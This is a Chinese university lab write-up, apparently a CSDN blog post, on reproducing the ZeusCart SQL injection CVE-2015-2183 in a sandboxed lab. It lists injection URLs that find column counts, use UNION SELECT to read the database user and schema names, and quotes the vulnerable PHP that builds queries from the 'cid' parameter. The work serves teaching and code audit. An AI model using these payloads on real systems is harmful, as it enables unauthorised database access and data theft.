实验八-CVE-2015-2183发现SQL注入漏洞

最新推荐文章于 2024-05-08 21:24:58 发布
最新推荐文章于 2024-05-08 21:24:58 发布
阅读量644 收藏 3
点赞数 2
分类专栏: 大学实践作业 文章标签: 数据库 mysql php
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/kelxLZ/article/details/111286140
版权

Author:ZERO-A-ONE

Date:2020-12-16

一、实验目的

通过源代码审计发现目标主机是否存在SQL注入漏洞

二、实验原理

SQL注入是指攻击者利用Web应用程序数据与代码未严格分离、没有对用户输入进行严格的转义字符过滤和类型检查的漏洞,将一段精心构造的SQL命令注入到后台数据库引擎执行,导致数据库信息泄漏、网站挂马、数据库的系统管理员帐户被纂改、服务器被黑客安装后门远程控制等

三、实验环境

  • 打开【SimpleSPC信息安全云实验系统】中的【CVE漏洞实例讲解】课程,选择【CVE-2015-2183 zeu】实验项目

  • 攻击机win7(IP地址:192.168.1.2),目标主机win 2008(IP地址:192.168.1.3)

四、实验步骤

1、访问http://192.168.1.3/admin/,使用账号admin和密码admin888进行登录,登录页面如下:

2、访问http://192.168.1.3/admin/?Do=editcurrency&cid=1,结果如下所示:

3、访问http://192.168.1.3/admin/?Do=editcurrency&cid=1‘,(’是左单引号),发现页面和第3步页面不一样,截图如下所示,判断目标网站存在SQL注入漏洞

4、访问http://192.168.1.3/admin/?Do=editcurrency&cid=1+order+by+5++,发现页面正常,截图如下所示:

5、访问http://192.168.1.3/admin/?Do=editcurrency&cid=1+order+by+6++,发现页面和第4步不一样,说明当前查询了5个字段,截图如下所示:

6、访问http://192.168.1.3/admin/?Do=editcurrency&cid=1+union+select+1,2,3,4,5++,发现2和4回显了,截图如下所示:

7、访问http://192.168.1.3/admin/?Do=editcurrency&cid=1+union+select+1,user(),5++,查询当前的用户和版本,截图如下所示

8、访问http://192.168.1.3/admin/?Do=editcurrency&cid=1+union+select+1group_concat(schema_name),3,4,5+from+information_schema.schemata++,查询当前的所有数据库,截图如下所示:

对c:\phpStudy\WWW\admin\classes\Core\Settings\的CCurrencySettings.php和c:\phpStudy\WWW\Bin\的Query.php进行代码审计

五、实验思考

1、请根据第9步中你对CCurrencySettings.php和Query.php源码阅读的理解,分别写出3~8步中showEditCurrency函数生成的select语句

分析源码:

function showEditCurrency($Err)
	{
		$sqlCat="SELECT * FROM country_table ORDER BY cou_name";
		$queryCat = new Bin_Query();
		$queryCat->executeQuery($sqlCat);
		$sqlCat1="SELECT * FROM currency_codes_table ORDER BY currency_name";
		$queryCat1 = new Bin_Query();
		$queryCat1->executeQuery($sqlCat1);
		if(isset($_GET['cid']))
		{
			$currencyid=trim($_GET['cid']);
			$sql="select id as hidecurrencyid,currency_name,currency_code,currency_tocken,status from currency_master_table where id=$currencyid";
			$qry = new Bin_Query();
			$qry->executeQuery($sql);
			
			return Display_DCurrencySettings::showEditCurrency($queryCat->records,$queryCat1->records,$qry->records,$Err);
		}
		else
			return '<div class="alert alert-error">
				<button type="button" class="close" data-dismiss="alert">×</button> No more currency.</div>';
	}

可以得知最后真正调用的sql语句为

select id as hidecurrencyid,currency_name,currency_code,currency_tocken,status from currency_master_table where id=$currencyid

然后阅读源码发现:

$currencyid=trim($_GET['cid']);
			$sql="select id as hidecurrencyid,currency_name,currency_code,currency_tocken,status from currency_master_table where id=$currencyid";

我们输入的参数cid即成为了currencyid

第三步:

http://192.168.1.3/admin/?Do=editcurrency&cid=1‘

则执行的sql语句为:

select id as hidecurrencyid,currency_name,currency_code,currency_tocken,status from currency_master_table where id=1‘

漏洞发现:通过这里可以发现sql语句执行失败,所以执行结果会返回一个布尔值,因为我们发现页面和前面页面不一样,说明服务器执行了我们的sql查询语句,所以可以得知存在sql注入漏洞

第四步:

http://192.168.1.3/admin/?Do=editcurrency&cid=1+order+by+5+--+

则执行的sql语句为:

select id as hidecurrencyid,currency_name,currency_code,currency_tocken,status from currency_master_table where id=1+order+by+5+--+

第五步:

http://192.168.1.3/admin/?Do=editcurrency&cid=1+order+by+6+--+

则执行的sql语句为:

select id as hidecurrencyid,currency_name,currency_code,currency_tocken,status from currency_master_table where id=1+order+by+6+--+

第六步:

http://192.168.1.3/admin/?Do=editcurrency&cid=1+union+select+1,2,3,4,5++

则执行的sql语句为:

select id as hidecurrencyid,currency_name,currency_code,currency_tocken,status from currency_master_table where id=1+union+select+1,2,3,4,5++

第七步:

http://192.168.1.3/admin/?Do=editcurrency&cid=1+union+select+1,user(),5+--+

则执行的sql语句为:

select id as hidecurrencyid,currency_name,currency_code,currency_tocken,status from currency_master_table where id=1+union+select+1,user(),5+--+

第八步:

http://192.168.1.3/admin/?Do=editcurrency&cid=1+union+select+1,group_concat(schema_name),3,4,5+from+information_schema.schemata+--+

则执行的sql语句为:

select id as hidecurrencyid,currency_name,currency_code,currency_tocken,status from currency_master_table where id=1+union+select+1,group_concat(schema_name),3,4,5+from+information_schema.schemata+--+

2、第4步和第5步页面显示不同,你认为可能是什么原因?

原因currency_master_table表的字段数为5

首先查看第四步和第五步的查询语句:

第四步:

select id as hidecurrencyid,currency_name,currency_code,currency_tocken,status from currency_master_table where id=1+order+by+5+--+

第五步:

select id as hidecurrencyid,currency_name,currency_code,currency_tocken,status from currency_master_table where id=1+order+by+6+--+

这个的原因是利用了ORDER BY判断字段数,ORDER BY n+1;让n一直增加直到出现错误页面,我们这里这里的时候到5之前都能正确查询,到字段数增加到6的时候超过了表查询的字段数,所以前后页面不同了,也就是发生了错误,故可以得到表的字段数为5

3、第6步仅回显2和4,你认为可能是什么原因?

原因:网页的显示位为2和4,网页只开放了2和4这两个个窗口

首先查看6的sql语句:

select id as hidecurrencyid,currency_name,currency_code,currency_tocken,status from currency_master_table where id=1+union+select+1,2,3,4,5++

UNION 操作符用于合并两个或多个 SELECT 语句的结果集

即常见的有回显的SQL注入中的判断显示位的手法,这个显示位指的是网页中能够显示数据的位置

id=1+union+select+1,2,3,4,5++

只有2和4能够回显,那么说明网页只能够显示第2和第4列中信息,不能显示其他列的信息。也可以理解为网页只开放了2和4这两个个窗口,你想要查询数据库信息就必须要通过这个窗口。所以如果我们想要知道某个属性的值,比如admin,就要把admin属性放到2或者4的位置上,这样就能通过第2或者4列爆出admin的信息

4、(选做,可以不做)为什么目标网站会存在SQL注入漏洞?请根据你对Query.php代码的审计结果来回答

function executeQuery($sql, $fields = array())
	{

		//if(substr_count($sql,'#')!=count($fields))
			//return false;
		if(count($fields)>0)
			$sql = $this->makeQuery($sql,$fields);	// Security::makeQuery();
		
		$i=0;
		$this->rs = mysql_query($sql); 
		$this->sql = $sql; 
		$this->insertid = mysql_insert_id();
		
		if(is_resource($this->rs))
			$this->totrows = mysql_num_rows($this->rs);
			
		if(!mysql_affected_rows() || $this->totrows < 1)
			return false;
		else
		{
			while($fetch = mysql_fetch_array($this->rs))
				$this->records[$i++] = $fetch;
				
			for($i=0;$i<count($this->records);$i++)
			{
				foreach ($this->records[$i] as $key=>$item)
				{
					if(is_numeric($key))
						unset($this->records[$i][$key]);
				}
			}
			return true;
		}
	}

原因:可以发现executeQuery没有对cid参数做任何的检查,完全信任用户的cid输入,导致了sql注入漏洞的产生

总结:

ZeusCart是一套基于PHP和MySQL的为中小型网店设计的开源购物系统。ZeusCart4版本的管理后台中存在SQL注入漏洞,该漏洞源于admin/URI没有充分过滤dispordersdetail和subadminmgtedit操作中的‘id’参数;admin/URI没有充分过滤editcurrency操作中的‘cid’参数。远程攻击者可利用该漏洞执行任意SQL命令。

ZERO-A-ONE
关注
  • 2
    点赞
  • 3
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
dvwa——sql注入
qq_45487671的博客
05-26 2591
SQL注入攻击实验 1.实验目的 (1)理解SQL注入的原理; (2)学习手工注入的过程; (3)掌握SQL注入工具的使用; (4)掌握SQL注入的防御技术。 2.实验要求 1、登陆DVWA平台,结合所学SQL注入漏洞的基本知识,爆出MYSQL版本号、安装路径等信息;最终爆出当前使用的数据库名称、数据表名称、字段名称、以及关键的字段值(比如用户名、密码等)。 2、DVWA安全级别设置为“Low”或者“Medium”,均可。 3.实验过程描述 1、判断是否存在SQL注入点。 id值输入1,发现正常显示 输入
【网络安全】SQL注入漏洞详解
love_wgll的博客
02-25 438
SQL注入漏洞的使用与预防、绕过 SQLmap工具的使用
登录页面的SQL注入漏洞
m0_61974571的博客
10-12 3825
1、在Linux准备一套Xampp或者Phpstudy:模拟攻防2、在vscode安装Rremote Development插件,进行远程调试新添加主机 在opt/lampp/security创建项目 login.php welcome.php 二、进行登陆的渗透测试 注入类攻击的核心点: (1)、拼接为有效的代码或语句(2)、确保完成了闭合,并且可以改变原有执行逻辑通常并非处理一下就可以完成拼接和闭合,需要不停的尝试,知道出现不一样的结果。这个尝试过程建议使用python+字典快速处理上述代码一共存
Python 开发 框架安全:Django SQL注入漏洞测试.(CVE-2021-35042)
最新发布
网络安全领域___专研者.
05-08 833
Django 是一个用 Python 编写的 Web 应用程序框架。它提供了许多工具和库,使得开发 Web 应用程序变得更加容易和高效。Django 遵循了“MTV”(模型-模板-视图)的设计模式,将应用程序的不同组件分离开来,使得开发人员可以更加专注于应用程序的不同方面。
SQL注入漏洞提交报告(示例)
王先生的博客
04-01 8500
一、详细说明: 危害说明:攻击者可以使用 SQL 注入绕过 Web 应用程序的身份验证和授权机制,并检索整个数据库的内容。SQLi 还可用于添加、修改和删除数据库中的记录,从而影响数据完整性。在适当的情况下,攻击者还可以使用 SQLi 来执行操作系统命令,然后可以使用这些命令进一步升级攻击。 测试步骤: burp抓包分析可知图为sql注入位置 下图可证明存在SQL注入漏洞 二、漏洞复现辅助信息: 漏洞URL:https://jl.175game.com/index.php/guide/index/i
网络安全——sql注入漏洞拓扑图
weixin_48739941的博客
02-06 1980
SQL注入漏洞-SQL注入原理与实践
HacHunter的博客
03-03 1239
什么是SQL注入?:所谓SQL注入,就是通过把SQL命令插入到Web表单提交或输入域名或页面请求的查询字符串,最终达到欺骗服务器执行恶意的SQL命令。具体来说,它是利用现有应用程序,将(恶意的)SQL命令注入到后台数据库引擎执行的能力,它可以通过在Web表单中输入(恶意)SQL语句得到一个存在安全漏洞的网站上的数据库,而不是按照设计者意图去执行SQL语句。 MySQL基础语法:MySQL 教程_w3cschool 浏览器打开sqli.com/sqli-1.php,其源码如下...
WordPress 5.8.3 SQL注入漏洞 CVE-2022-21661.pdf
09-27
【WordPress 5.8.3 SQL注入漏洞 CVE-2022-21661】是一个近期发现的安全问题,涉及到WordPress的核心函数`WP_Query`。这个漏洞并非直接的SQL注入,但因为`WP_Query`经常被WordPress插件广泛使用,所以其潜在的危害...
laravel-CVE-2021-3129-EXP-main.zip 写shellexp
12-17
**Laravel 框架中的 CVE-2021-3129 漏洞详解及 EXP 利用** Laravel 是一个流行的开源 PHP Web 应用框架,以其优雅的语法和强大的功能深受开发者喜爱。然而,就像任何其他软件一样,Laravel 也存在安全漏洞。其中之...
CVE-2022-33891POC Apache Spark 命令注入(CVE-2022-33891)POC
08-10
CVE-2022-33891POC Apache Spark 命令注入(CVE-2022-33891)POC CVE-2022-33891 影响版本 Apache spark version 3.1.1版本 Apache Spark version>= 3.3.0 修复方案 1.建议升级到安全版本,参考官网链接: ...
CVE-2015-7857 Joomla注入漏洞利用工具
04-18
CVE-2015-7857,又称为“Joomla SQL注入漏洞”,是由于Joomla在处理特定的用户输入时,没有进行足够的数据验证和过滤,导致恶意用户可能通过构造恶意请求来执行SQL命令。这个漏洞主要影响Joomla 3.2.0至3.2.3版本,...
CVE-2015-1701:APT攻击中使用的Win32k LPE漏洞
01-30
2015年,安全研究人员发现了一个严重的问题,即CVE-2015-1701,这是一个针对Windows系统的本地权限提升(Local Privilege Escalation, LPE)漏洞,特别被高级持续性威胁(Advanced Persistent Threat, APT)所利用...
CVE-2020-13925 Apache Kylin 远程命令执行漏洞.md
04-12
CVE-2020-13925 Apache Kylin 远程命令执行漏洞
【安全渗透】sql注入
wy233333的博客
04-09 694
目录1. sql 注入1.1 sql 注入 介绍1.2 sql 注入 原理1.3 sql 注入 危害1.4 sql 注入 实现方式2. 环境搭建2.1 vmware虚拟机软件2.2 靶机(学习使用项目环境)2.3 渗透机(学习攻击 sql 注入环境)3. sql语句基本操作(mysql为例)3.1 基本 sql 库操作语句3.2 查询语句3.3 联合查询 union3.4 特殊数据库 1. sql...
SQL注入攻击课程设计
毕业作品网站
09-19 719
采用 PHP 进行网页编程,main.php 为目标网站主页面,选择 low,improved 两个选项,进入不同安全等级的网页,其中 low 安全等级最低,本文转载自http://www.biyezuopin.vip/onews.asp?最后,安装 PHP,输入命令"sudo apt-get install php7.0 libapache2-mod-php" , “sudo apt-get install php7.2-mysql”,并进行相应的配置操作。2.1 目标机器的环境 1。
Apache Spark 命令注入漏洞CVE-2022-33891)修复与利用
Apache Spark 命令注入漏洞CVE-2022-33891) Apache Spark 命令注入漏洞CVE-2022-33891)是 Apache Spark 中的一种高危漏洞,允许攻击者通过命令注入来执行恶意命令,从而控制服务器。该漏洞影响 Apache Spark ...

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值